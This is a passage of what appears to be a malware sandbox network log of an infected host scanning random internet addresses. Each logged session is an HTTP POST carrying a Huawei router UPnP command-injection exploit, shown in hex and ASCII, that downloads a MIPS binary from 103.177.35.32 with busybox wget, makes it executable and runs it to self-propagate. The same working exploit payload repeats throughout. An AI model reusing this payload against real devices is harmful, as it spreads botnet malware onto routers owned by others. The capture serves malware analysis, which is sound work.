                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        297192.168.2.2355334197.112.214.24037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.318980932 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        298192.168.2.2341724157.253.111.11237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.319099903 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        299192.168.2.2350742157.150.175.21737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.319102049 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        300192.168.2.235623641.187.227.8137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.319109917 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        301192.168.2.2359432157.230.11.17637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.319135904 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        302192.168.2.233487257.64.218.23137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.319163084 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        303192.168.2.2337846197.51.97.22437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.319401979 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        304192.168.2.2344816197.69.199.1037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.319463968 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        305192.168.2.2348700197.141.168.6737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.319592953 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        306192.168.2.2359148147.192.178.16337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.319868088 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
